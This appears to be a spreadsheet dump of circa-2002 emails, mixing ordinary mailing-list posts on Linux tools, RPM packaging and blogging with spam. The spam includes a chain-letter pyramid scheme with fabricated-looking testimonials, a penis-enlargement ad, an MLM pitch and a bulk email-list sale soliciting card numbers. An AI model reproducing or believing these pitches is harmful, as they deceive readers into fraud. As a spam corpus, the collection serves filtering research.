 Before you make your decision as to whether or not you participate
 in this program, answer one question ...
 DO YOU WANT TO CHANGE YOUR LIFE? If the answer is yes, please look
 at the following facts about this program:
 1. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST ANYTHING TO
 PRODUCE!
 2. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST ANYTHING TO SHIP!
 3. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST YOU ANYTHING TO
 ADVERTISE!
 4. YOU ARE UTILIZING THE POWER OF THE INTERNET AND THE POWER OF
 MULTI-LEVEL MARKETING TO DISTRIBUTE YOUR PRODUCT ALL OVER THE
 WORLD!
 5. YOUR ONLY EXPENSES OTHER THAN YOUR INITIAL $25 INVESTMENT IS
 YOUR TIME!
 6. VIRTUALLY ALL OF THE INCOME YOU GENERATE FROM THIS PROGRAM IS
 PURE PROFIT!
 7. THIS PROGRAM WILL CHANGE YOUR LIFE FOREVER.
 ******* TESTIMONIALS*******
 This program does work, but you must follow it EXACTLY! Especially
 the rule of not trying to place your name in a different position,
 it won't work and you'll lose a lot of potential income. I'm
 living proof that it works. It really is a great opportunity to
 make relatively easy money, with little cost to you. If you do
 choose to participate, follow the program exactly, and you'll be
 on your way to financial security. -Steven Bardfield, Portland, OR
 My name is Mitchell.  My wife, Jody, and I live in Chicago, IL. I
 am a cost accountant with a major U.S. Corporation and I make
 pretty good money. When I received the program I grumbled to Jody
 about receiving "junk mail." I made fun of the whole thing,
 spouting my knowledge of the population and percentages involved.
 I 'knew' it wouldn't work. Jody totally ignored my supposed
 intelligence and jumped in with both feet. I made merciless fun of
 her, and was ready to lay the old 'I told you so' on her when the
 thing didn't work... well, the laugh was on me! Within two weeks
 she had received over 50 responses. Within 45 days she had
 received over $147,200 in $5 bills! I was shocked! I was sure that
 I had it all figured and that it wouldn't work. I AM a believer
 now. I have joined Jody in her "hobby. " I did have seven more
 years until retirement, but I think of the 'rat race,' and it's
 not for me. We owe it all to MLM. -Mitchell Wolf MD., Chicago, IL.
 The. main reason for this letter is to convince you that this
 system is honest, lawful, extremely profitable, and is a way to
 get a large amount of money in a short time. I was approached
 several times before 1 checked this out. I joined just to see what
 one could expect in return for the minimal effort and money
 required. To my astonishment I received $36,470.00 in the first 14
 weeks, with money still coming in.
 -Charles Morris, Esq.
 Not being the gambling type, it took me several weeks to make up
 my mind to participate in this plan. But conservative that I am, I
 decided that the initial investment was so little that there was
 just no way that I wouldn't get enough orders to at least get my
 money back. Boy, was I surprised when I found my medium- size post
 office box crammed with orders! For awhile, it got so overloaded
 that I had to start picking up my mail at the window. I'll make
 more money this year than any 10 years of my life before. The nice
 thing about this deal is that it doesn't matter where people live.
 There simply isn't a better investment with a faster return.
 -Paige Willis, Des Moines, IA
 I had received this program before. I deleted it, but later I
 wondered if I shouldn't have given it a try. Of course, I had no
 idea who to contact to get another copy, so I had to wait until I
 was e-mailed another program ... 11 months passed then it came ...
 I didn't delete this one! ... I made. more than $41,000 on the
 first try!!  -Violet Wilson, Johnstown, PA
 This is my third time to participate in this plan. We have quit
 our jobs, and will soon buy a home on the beach and live off the
 interest on our money. The only way on earth that this plan will
 work for you is if you do it. For your sake, and for your family's
 sake don't pass up this golden opportunity. Good luck and happy
 spending!  -Kerry Ford, Centerport, NY
 IT IS UP TO YOU NOW!  Take 5 minutes to Change Your Future!
 ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO FINANCIAL
 FREEDOM!
 FOR YOUR INFORMATION: If you need help with starting a business,
 registering a business name, learning how income tax is handled,
 etc., contact your local office of the Small Business
 Administration (a Federal agency) 1(800) 827-5722 for free help
 and answers to questions. Also, the Internal Revenue Service
 offers free help via telephone and free seminars about business
 tax requirements.
 Under Bill S1618 Title HI passed by the 105th US Congress this
 letter cannot be considered spam as long as the sender includes
 contact information and a method of removal. 
 This is not a spam! Your are receiving this email either because, 
 you have sent me and email in the past, or you are on a list of 
 marketers requesting information. If this is not the case, 
 PLEASE accept my sincerest apologies and reply with "remove" in the 
 subject field at tonygremv@starmail.com. I will remove your name 
 immediately! 
 STOP! If you ever read another e-mail PLEASE take a moment to
 read this one. This really is worth your valuable time.
 At the very least PRINT THIS OUT NOW to read later if you are
 pressed for time.
  SSM1
 7442MCPk0-l9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</si>
  <si>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Recommended Viewing
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman &lt;geege@barrera.org&gt; writes:
     G&gt; you meant "SURPRISINGLY perceptive," didn't you?  :-) 
 Of course, dear.  Especially without zazen training.  Veritably
 Operational Thetan-like.
     G&gt; recent exceptionally vivid and strange dreams lead me to
     G&gt; believe i'm sparking synapses that have lain dormant lo these
     G&gt; many years.  Lots of problem solving going on up there at
     G&gt; night.
 It's a myth that we don't use parts of our brain.  We use it all,
 always.  It's just that our culturally-induced focal-point causes most
 of us to most of the time ignore and waste 99.999% of it.  "Lucid" is
 a measure of notch-filter bandwidth; all stations are broadcasting,
 but we only /choose/ Easy Rock 105.
 For example, don't look now but your shoes are full of feet.
 The sensation of toes the above statement evokes is not a "turning on"
 of circuits, it is a "tuning in".  The next step, of course, is to
 "drop out" :)
 To paraphrase an old saw: Life is wasted on the living.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Exmh &amp;&amp; speed
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Valdis.Kletnieks@vt.edu said:
 &gt; I checked on a number of small messages in a big folder (~10000 
 &gt; msgs). The delay of the Next button has increased considerably:
 &gt; 
 &gt; 2.5-release: 350-450 msec
 &gt; latest cvs: 1000-12000 msec
 &gt; I'm not seeing a hit on 'next'. A quick "just pound on 'next' and
 &gt; watch the wall clock" test shows me able to go through 20 messages in
 &gt; under 5 seconds, so it's well under 250ms per switch, but I'm seeing a
 &gt; really piggy CPU spike (100% for a few seconds) in the 'flist' code.
 &gt; Of course, it seems to be related to number-of-folders:
 &gt; [~] wc Mail/.folders
 &gt;     131     131    1122 Mail/.folders 
 I have 167 folders (!) and run with bg-proc set to flist (1 minute). 
 I see delays, but not that much. Maybe 1-3 seconds (which tend to 
 disappear these days). This is on a PII-266.
 BR,
 /A
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: making rpms from already-compiled source trees
</t>
  </si>
  <si>
    <t xml:space="preserve">Please see:
 http://dudex.net/rpms/lincvs-0.9.90-rh7.123.spec
 snipet:
 &gt;# extract the ESP package archive
 &gt;tar xvf lincvs.ss
 That *.ss file is really a tar file, I had to use the linCVS pre-compiled binary
 from their ESP install thingie because the one I compiled on my RH box would not run
 on as many systems. The guy said something like this: "it's an evil binary that only
 runs on one system", so I took the hint :)
 NOTE: I think I understand why RPM makes you go thru the whole build process: prep,
 patch, build, install, package ... there are ways to get around this, but the
 package would not be "from pristine sources" so to speak. I read that the 1st big
 change they made to RPM was to always use "pristine" sources, then have prep apply
 the packager's patches; whereas the early RPMS were already RH patched, apparently,
 not having the "pristine" sources as the author had released them.
 Just a guess ... ???
 Gary Peck (gbpeck@sbcglobal.net) wrote*:
 &gt;
 &gt;On Wed, Aug 14, 2002 at 10:14:18PM -0700, Jesse Keating wrote:
 &gt;&gt; On Wed, 14 Aug 2002 22:03:36 -0700
 &gt;&gt; Gary Peck &lt;gbpeck@sbcglobal.net&gt; wrote:
 &gt;&gt;
 &gt;&gt; #
 &gt;&gt; #The closest I've gotten is to use "rpmbuild -bi --short-circuit" but
 &gt;&gt; #that falls one step short of actually creating the rpm files. There
 &gt;&gt; #must be some obvious option I'm missing...
 &gt;&gt;
 &gt;&gt; By design, I don't believe there is a way to do what you are asking.
 &gt;
 &gt;Out of curiousity, is there any particular reason for the design? It
 &gt;seems like it'd be an extremely useful option to have -- especially
 &gt;when building large programs that take hours to compile.
 &gt;
 &gt;&lt;rant&gt;
 &gt;The current implementation already does EVERYTHING (including checking
 &gt;the %files list and running find-provides and find-requires) except
 &gt;for generating the actual rpm files. I'm sure if I were to look into
 &gt;the source, I could write a patch that wouldn't take more than a
 &gt;handful of lines.
 &gt;&lt;/rant&gt;
 &gt;
 &gt;gary
 &gt;
 &gt;_______________________________________________
 &gt;RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt;
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Jeremy Bowers: "None of the trackback mechanisms has reached the
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:12:19AM
 Date: Wed, 25 Sep 2002 12:12:19 GMT
 Jeremy Bowers[1]: "None of the trackback mechanisms has reached the critical 
 mass necessary to see the negative effects experienced in all other community 
 models."
 [1] http://www.jerf.org/irights/2002/09/25.html#a2231
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: USA USA WE ARE NUMBER ....six.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; chris arkenberg wrote:
 &gt; &gt; Cheers, Adam.
 &gt; &gt; 
 &gt; &gt; Perhaps people are starting to notice how profit motive drains the 
 &gt; &gt; meaning out of their lives.
 &gt; 
 &gt; And, having realized that, a lot of them are now having babies.
 &gt; I can't believe the number of friends at work who are now pregnant
 &gt; or have already just had their babies.
 .boom?
 - Jim
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On 06 September 2002, Tim Peters said:
 &gt; &gt; Note that header names are case insensitive, so this one's no
 &gt; &gt; different than "MIME-Version:".  Similarly other headers in your list.
 &gt; 
 &gt; Ignoring case here may or may not help; that's for experiment to decide.
 &gt; It's plausible that case is significant, if, e.g., a particular spam mailing
 &gt; package generates unusual case, or a particular clueless spammer
 &gt; misconfigures his package.
 Case of headers is definitely helpful.  SpamAssassin has a rule for it
 -- if you have headers like "DATE" or "SUBJECT", you get a few more
 points.
         Greg
 -- 
 Greg Ward &lt;gward@python.net&gt;                         http://www.gerg.ca/
 God is omnipotent, omniscient, and omnibenevolent
 ---it says so right here on the label.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Turn Your PayPal account into a Non-Stop Cash Machine!! (Not a chain letter)
</t>
  </si>
  <si>
    <t xml:space="preserve">I am sending you this message because we have communicated in the past about business opportunities. I hope you will enjoy this one as much as I do.
 Turn Your PayPal Account Into A Non-Stop Cash Machine!
 Re-Occurring 100% Commissions Paid Directly To Your PayPal Account! 
 4 Out Of 10 Visitors Join INSTANTLY! 
 Shouldn't You Be Next? 
 Did I Mention That It's Free For 15 Days? 
 Simply go to: http://www.paypal-profits.com/a/turnkeyim/
 Best Wishes,
 Tony &amp; Donna Scurlock
 turnkeyim@hotmail.com
 The Best Home-Based Business on the Planet!!
 WE BUILD YOUR DOWNLINE -- 1000 to 3500 members added per month!! 
 FREE to JOIN!!
 Minimum Monthly Income!!
 Get all the details at: 
 http://www.lifelong-income.com
 ****************************************************
 This email message is sent in compliance with the the 106th Congress E-Mail User Protection Act (H.R. 1910) and the Unsolicited Commercial Electronic Mail Act of 2000 (H.R. 3113). Though our intention is not to communicate with you again if we receive no response from you, we do provide a valid vehicle for you to be removed from our email list. To be removed from our mailing list, simple reply to this message with REMOVE in the Subject line.
 Please keep in mind that complaints to our email provider and service provider, could make honoring remove requests impossible and you will be in violation of the above legislation.
 ****************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Janis Ian interviewed on Slashdot
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85482094
 Date: Not supplied
 Janis Ian, a brave and talented recording artist (and budding and talented 
 science fiction writer) has done a terrific interview with the Slashdot 
 groupmind about her views on the music industry. 
     Seriously, diversity is something record companies can't afford anymore - 
     not the majors, at any rate. I'd go to this article, posted at Linux 
     Journal, which quotes a Newsweet article (July 15,2002) by Steven Levy 
     saying "So why are the record labels taking such a hard line? My guess is 
     that it's all about protecting their Internet-challenged business model. 
     Their profit comes from blockbuster artists. If the industry moved to a 
     more varied ecology, independent labels and artists would thrive--to the 
     detriment of the labels, which would have trouble rustling up the rubes to 
     root for the next Britney. The smoking gun comes from testimony of an 
     RIAA-backed economist who told the government fee panel that a dramatic 
     shakeout in Webcasting is "inevitable and desirable because it will bring 
     about market consolidation." That's really it in a nutshell. "Market 
     consolidation" means the less artists they have to promote, the less 
     ultimate dollars they'll spend. The smaller the playlist, the greater the 
     chance that audiences will buy something from that playlist alone - because 
     that's all you'll be able to find out there.  
 Link[1] Discuss[2]
 [1] http://slashdot.org/article.pl?sid=02/09/23/133228
 [2] http://www.quicktopic.com/boing/H/8nEQCxZaP8U6X
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fred Grott: How to Keep RDF and RSS Straight.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:36:11AM
 Date: Wed, 25 Sep 2002 12:36:11 GMT
 Fred Grott: How to Keep RDF and RSS Straight[1].
 [1] http://www.diaries.com/ShareMe/2002/09/24
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: GREAT News for Men! NEW Breakthrough!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;
 &lt;table bgcolor=3D"663399" border=3D"2" width=3D"999" cellspacing=3D"0" cel=
 lpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td colspan=3D"3" width=3D"999"&gt; &lt;hr&gt;&lt;font color=3D#66FF66"&gt; 
 &lt;font size=3D"5"&gt;&lt;center&gt;
 We &lt;b&gt;won't&lt;/b&gt; lie to you, smaller &lt;b&gt;IS&lt;/b&gt; better.......&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 When you're talking about &lt;b&gt;SUPERCOMPUTERS!&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt; 
 We HATE to break it to you guys, &lt;br&gt;but women don't think that way...
 &lt;center&gt;&lt;b&gt;&lt;br&gt;&lt;br&gt;
 In the REAL WORLD, &lt;br&gt;
 Size &lt;font size=3D"7"&gt;&lt;i&gt;DOES &lt;/i&gt;&lt;font size=3D"6"&gt;matter. &lt;font size=3D"7=
 "&gt;BIG
 &lt;font size=3D"6"&gt; time!&lt;br&gt;&lt;br&gt;
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;
 &lt;center&gt;&lt;font size=3D"6"&gt;
 &lt;a href=3D"http://www.freehostchina.com/site2/web2pleasure/index.html"&gt; &lt;b=
 r&gt;&lt;b&gt;Breakthroughs&lt;/a&gt; in Science&lt;/b&gt;&lt;br&gt;
  have finally &lt;i&gt;enabled&lt;/i&gt; men like you,&lt;br&gt; to take things into their o=
 wn hands!
  &lt;br&gt; &lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt; 
  &lt;font size=3D"5"&gt;
 Most of our techniques are 21st Century, but some of these techniques &lt;br&gt;=
 have been around for CENTURIES! &lt;br&gt; &lt;br&gt; 
 &lt;i&gt;Ancient secrets&lt;/i&gt;, that only specific tribes, taught their wisest eld=
 ers.&lt;br&gt; &lt;br&gt; 
 We reveal ALL of these to you, and&lt;a href=3D"http://www.freehostchina.com/=
 site2/web2pleasure/index.html"&gt; more!&lt;/a&gt;&lt;br&gt; &lt;br&gt; &lt;br&gt; 
 &lt;font color=3D"#66CCFF"&gt;
 What can our techniques help you accomplish &lt;i&gt;naturally&lt;/i&gt;?&lt;br&gt; &lt;br&gt; 
 &lt;font size=3D"6"&gt;
 &lt;font color=3D"#FFFF00" &gt; 
 Effectively ADD between 1" to 4.5" to your penis size! &lt;br&gt;
 &lt;font size=3D"4"&gt;
 &lt;i&gt;Without&lt;/i&gt; surgery, pumps, or other painful methods. &lt;br&gt;&lt;br&gt;
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;
 &lt;font color=3D"#6633FF"&gt;&lt;font size=3D"5"&gt;&lt;br&gt; 
 "I'm convinced, let me get access to these,&lt;br&gt;
 &lt;a href=3D"http://www.freehostchina.com/site2/web2pleasure/index.html"&gt; AM=
 AZING TECHNIQUES ONLINE!&lt;/a&gt;"  
  &lt;br&gt; &lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;br&gt; 
 &lt;font color=3D#66FF66"&gt;
 &lt;font size=3D"5"&gt;&lt;br&gt; 
 Every man on the &lt;i&gt;planet&lt;/i&gt; would like to increase &lt;br&gt;
 his penis SIZE and WIDTH, and we can show you how to do BOTH!  &lt;br&gt;&lt;br&gt;
 &lt;br&gt; 
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;&lt;font size=3D"5"&gt;&lt;br&gt;
 Don't be Fooled by methods that only increase your LENGTH!&lt;br&gt;&lt;br&gt;
 &lt;a href=3D"http://www.freehostchina.com/site2/web2pleasure/index.html"&gt;Inc=
 rease the LENGTH &lt;b&gt;and&lt;/b&gt; WIDTH of your penis!&lt;/a&gt;
   &lt;br&gt; &lt;br&gt; SAFELY and NATURALLY&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;br&gt; 
 &lt;br&gt; &lt;br&gt; &lt;br&gt; &lt;br&gt; &lt;br&gt;  &lt;hr&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;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</si>
  <si>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[ILUG] connecting at 1200bps in RH7.3 (help!)
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,
 Anyone ever try connecting at 1200bps in Linux? I've got a USR 56K
 Faxmodem which is meant to connect to another (same) modem and I have to
 connect at this speed due to the (NT) port settings on the remote side,
 but the modem handshake always fails at this speed.
 The modem handshake works at slightly higher speeds (4800bps to
 ~57600bps) but that is no good for tx/rx'ing data to the remote server
 as it insists at talking at the speed of treacle/1200bps.
 Note Minicom fails to handshake at 1200bps, but HyperTerm in Windows
 worked first time(!?), any ideas?
 Baud 1200 7 data bits Even Parity
 I am doing a ATZ3 to reset the modem then I send this init string:
 AT&amp;F1E1V1Q0X4Y0S32=232&amp;A1&amp;B0&amp;C1&amp;D2&amp;H0&amp;I0&amp;K1&amp;M4&amp;N0&amp;P0&amp;R1&amp;S0&amp;U0&amp;Y1
 ... which is most of the defaults.
 USR said to set S15=128 (disables v.42)) 
 &amp; set S32=98 (disable v.92 &amp; X2)
 But the S15=128 just makes the handshake lockup instead of just giving
 up.
 btw this is a bank's system I am connecting to so reconfiguring their
 modems may be difficult.
 Colin.
 -- 
 Colin Nevin,
 Software Engineer,
 Merit Solutions Ltd. (Dublin),
 5 Goatstown Cross,
 Dublin 14.
 ------------------------------------------
 Printed using 100% recycled electrons.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I've been hearing a lot about FOAF, which is an acronym for
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:10:34:18AM
 Date: Mon, 23 Sep 2002 17:34:18 GMT
 I've been hearing a lot about FOAF, which is an acronym for Friend Of A Friend. 
 It's an RDF-based file format that lets you walk a network of people who are 
 friends. It's a lot like a network of blogrolls[1]. 
 [1] http://radio.outliners.com/stories/storyReader$85
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Commissions of $5000 per WEEK! ssva
</t>
  </si>
  <si>
    <t xml:space="preserve">Give me 5 minutes and I will show you how
 to turn your computer into a cash machine!!!
 (Available in the US and Canada)
 I earned $25,000 last month - send for my bank statements!!!
 We are giving away a FREE, 3-day vacation to all
 folks who ask for more info on how to earn $1000
 per sale simply by using their computer!
 You'll earn $1000 per sale on a low cost product and
 $3000 per business contact - 
 and all marketing is from the internet. Free
 sophisticated and duplicatable marketing system
 ($2500 value) is given to you gratis - as well as ALL
 training and marketing support!!!
 We invite you to explore, with no obligation, some
 information that could turn around your
 income and bring in thousands per week! 
 If you just want some extra income, or if you are a 
 seasoned marketer - our paint-by-numbers system with LIVE
 support (up to 10:00 pm eastern every day!) will turn you
 into a pro!!!
 Family-loved product!!!
 We will have you in profit QUICK - and with
 constant, live FREE support!!!!
 REQUEST more free info NOW-
 send an email to: growthmarkets@excite.com with "SEND INFO" in the subject line!!
 (do NOT click REPLY!)
 **********************************************************
 This email conforms to commercial email regulations within the US.
 Please send any "remove" requests to: growthmarkets@excite.com
 **********************************************************
 hqkudlnlusqgpxxmqaesrhrmvpjfykfg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</si>
  <si>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f-rpm] Python 2.2 site libs?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 4 Oct 2002, Mark Derricutt wrote:
 &gt; Anyone know why Red Hat insist on sticking with python 1.5.2?
 ehhh?  IANAHNBARHE -- RHL 8.0 is fully python-2, with a back
 compatability v 1 shim set.  This has been working and freely
 available in their Raw Hide for 5 months for early adopters
 and back-porters.
 Red Hat maintains binary compatability across major releases.  
 Its server management tools are heavily Python, and becoming 
 more so.
 To have added mid-stream the python-2 series in the RHL 7.x
 series would have been quite disruptive to an existing 
 installed base.
 -- Russ Herrold
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: (_) Increase Your Sales!!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Consumers, Increase your Business Sales! 
 How??
 By targeting millions of buyers via e-mail !! 
 25 MILLION EMAILS + Bulk Mailing Software For Only $150.00
 super low price! ACT NOW !!!
 Our Fresh Addresses Will Bring You 
 Incredible Results!
 If you REALLY want to get the word out regarding
 your services or products, Bulk Email is the BEST 
 way to do so, PERIOD! Advertising in newsgroups is 
 good but you're competing with hundreds even THOUSANDS
 of other ads. Will your customer's see YOUR ad in the 
 midst of all the others?
 Free Classifieds? (Don't work)
 Web Site? (Takes thousands of visitors)
 Banners? (Expensive and iffy)
 E-Zine? (They better have a huge list)
 Search Engines? (Easily buried with thousands of others)
 Bulk Email will allow you to DIRECTLY contact your
 potential customers. They are much more likely to
 take the time to read about what you have to offer 
 if it was as easy as reading it via email rather
 than searching through countless postings in 
 newsgroups.
 The list's are divided into groups and are compressed. 
 This will allow you to use the names right off the cd. 
 ORDER IN THE NEXT 72 hours AND RECIEVE 4 BONUSES!!
 ORDER IN THE NEXT 48 HOURS AND RECIEVE FULL TECHNICAL SUPPORT !!!
 ACT NOW !!!!!!!!!!!!!!
 *BONUS #1 Receive an additional cd-rom with millions of fresh, 
 deliverable general internet e-mail addresses free!! 
 *BONUS #2 Receive 2000 how to books, reports and manuals on cd-rom with
 reprint resale rights! Produce for pennies and resell for BIG dollars! 
 *BONUS #3 Receive the Mass Mailer bulk delivery software, with full
 operating instructions. This software will get the mail out QUICK! 
 *BONUS #4 Receive the Informational Guide to bulk e-mail. This guide 
 will give you all the information you need to get started! 
 THIS IS A ONE TIME PACKAGE DEAL WORTH HUNDREDS OF DOLLARS!! 
 ACT NOW! THIS IS A LIMITED TIME OFFER! ORDER WHILE SUPPLIES LAST! 
 RECEIVE THIS DREAM PACKAGE FOR THE UNBELIEVABLE LOW, LOW PRICE OF 
 ONLY $150.00
 ORDERING INFORMATION:
 CHECK BY FAX SERVICES OR CREDIT CARD INFO: 
 O R D E R N O W . . . SAME DAY SERVICE (M-F) if your order
 is received before 3pm Central . To place an order, you can call us at: 
 1-308-650-5905 ext 121 Are fax your order to 1-415-873-2700 
 This Number is for credit Card Orders Only!!!
 CHECK BY FAX SERVICES!
 __________________________________________
 To order, via credit card simply cut/paste and print out the
 EZ ORDER FORM below and fax to our office today.
 ***** NOW ONLY $150! *****
 This "Special Price" is in effect for the next seven days,
 after that we go back to our regular price of $250.00 ...
 Don't delay... you can be in business tomorrow! 
 We accept Visa, Mastercard, Amex, Disc and Checks by Fax.
 ----------------------Cut &amp; Paste----------------------
 ---------------------EZ Order Form---------------------
 _____Yes! I want everything! I am ordering within 72 hours.
 Include my FREE "Business On A Disk" bonus along with your 
 Millions of E-Mail addresses on CD (plus 1,093,808 bonus addresses)
 for the special price of only $150.00 + shipping as indicated
 below.
 _____Yes! I missed the 72 hour special, but I am ordering
 CD WITH, super clean e-mail addresses within 7 days for the
 "special" price of only $250.00 + s&amp;h.
 _____Oop's I missed the 72 hour and 7 day "specials". I am
 ordering The Cd at the regular price of $250.00 + s&amp;h.
 ***PLEASE SELECT YOUR SHIPPING OPTION***
 ____I would like to receive my package FedEx OVERNIGHT. I am
 including $15 for shipping. (Hawaii &amp; Alaska $20 - Canada $25,
 all other International add an *additional* $25 [$40 total] for shipping)
 ____I would like to receive my package FedEx 2 DAY delivery.
 I'm including $10 for shipping. (Sorry no Canada or International
 delivery - Continental U.S. shipping addresses only)
 ***Please Print Carefully***
 NOTE: Orders cannot be shipped without complete information
 including your signature. No exceptions!
 NAME____________________________________________________
 COMPANY NAME____________________________________________
 ADDRESS_________________________________________________
 (FedEx can only ship to street addresses - no P.O. boxes)
 CITY, STATE, ZIP________________________________________
 PHONE NUMBER____________________________________________
 (required for shipping &amp; tracking) 
 EMAIL ADDRESS___________________________________________
 (Print Carefully - required in case we have a question and to
 send you a confirmation that your order has been shipped and for 
 technical support if you order within 24 hrs) 
 TYPE OF CREDIT CARD:
 ______VISA _____MASTERCARD ______AMEX ______DISC
 CREDIT CARD# __________________________________________
 EXPIRATION DATE________________________________________
 NAME ON CARD___________________________________________
 TOTAL AMOUNT (Including Shipping): $___________________
 DATE:x__________________
 (Required) SIGNATURE:x_________________________________
 I understand that I am purchasing the e-mail address on CD,
 and authorize the above charge to my credit card, the addresses are not rented, 
 but are mine to use for my own mailing, over-and-over. Free bonuses are included, 
 but cannot be considered part of the financial transaction. I understand that it 
 is my responsibility to comply with any laws applicable to my local area. As with 
 all software, once opened the CD may not be returned, however, if found defective 
 it will be replaced with like product at no charge.
 O R D E R N O W . . . SAME DAY SERVICE (M-F) if your order
 is received before 3pm Central . To place an order, you can call us at: 
 1-308-650-5905 ext 121 Are fax your order to1-415-873-2700 
 This Number is for credit Card Orders Only!!!
 CHECK BY FAX SERVICES!
 If you would like to fax a check, paste your check below and fax it to our office 
 along with the EZ Order Form forms to: 1-415-873-2700 
 **********************************************************
 ***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 CHECK HERE AND FAX IT TO US AT 1-415-873-2700 
 **********************************************************
 If You fax a check, there is no need for you to mail the
 original. We will draft a new check, with the exact
 information from your original check. All checks will be
 held for bank clearance. (7-10 days) Make payable to: 
 "S.C.I.S"
 -=-=-=-=--=-=-=-=-=-=-=offlist  Instructions=-=-=-=-=-=-=-=-=-=-=-=
 ----------------------------------------------------------------------
 Do not reply to this message - 
 To be off from future mailings:
 mailto:trudymail2002@themail.com?Subject=offitnow
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Meaningful sentences
</t>
  </si>
  <si>
    <t xml:space="preserve">The Scotsman
  Thu 22 Aug 2002 
  Meaningful sentences 
  Tracey Lawson 
  If you ever wanted to look like "one of the most dangerous inmates in prison
  history", as one judge described Charles Bronson, nows your chance. Bronson -
  the serial hostage taker, not the movie star - has written a health and
  fitness guide in which he shares some of the secrets behind his legendary
  muscle power. 
  Solitary Fitness - a title which bears testament to the fact that Bronson, 48,
  has spent 24 of his 28 prison years in solitary confinement - explains how he
  has turned himself into a lean, mean, fitness machine while living 23 hours a
  day in a space just 12 feet by eight feet, on a diet of scrubs grub and at
  virtually no cost. 
  The book is aimed at those who want to get fabulously fit without spending a
  fortune on gym memberships, protein supplements or designer trainers, and
  starts with a fierce attack on some of the expensive myths churned out by the
  exercise industry. 
  "I pick up a fitness mag, I start to laugh and I wipe my arse with it," is the
  opening paragraph penned by Bronson. "Its a joke and a big con and they call
  me a criminal!" You cant help feeling he has a point. 
  This is not the first book that Bronson has written from behind bars, having
  already published Birdman Opens His Mind, which features drawings and poems
  created by Bronson while in prison. And he is not the first prisoner to
  discover creative expression while residing at Her Majestys pleasure. 
  Jimmy Boyle, the Scots sculptor and novelist, discovered his artistic talents
  when he was sent to Barlinnie Prisons famous special unit, which aimed to
  help inmates put their violent pasts behind them by teaching them how to
  express their emotions artistically. Boyle was sentenced to life for the
  murder of "Babs" Rooney in 1967. Once released, he moved to Edinburgh where he
  has become a respected artist. His first novel, Hero of the Underworld, was
  published in 1999 and his autobiography, A Sense of Freedom, was made into an
  award-winning film. 
  Hugh Collins was jailed for life in 1977 for the murder of William Mooney in
  Glasgow, and in his first year in Barlinnie prison stabbed three prison
  officers, earning him an extra seven-year sentence. But, after being
  transferred to the same unit that Boyle attended, he learned to sculpt and
  developed an interest in art. He later published Autobiography of a Murderer,
  a frank account of Glasgows criminal culture in the 1960s, which received
  critical praise. 
  And Lord Archer doesnt seem to have had trouble continuing to write the books
  that have made him millions while in jail. He recently signed a three-book
  deal with Macmillan publishers worth a reported 10 million, and is no doubt
  scribbling away as we speak. 
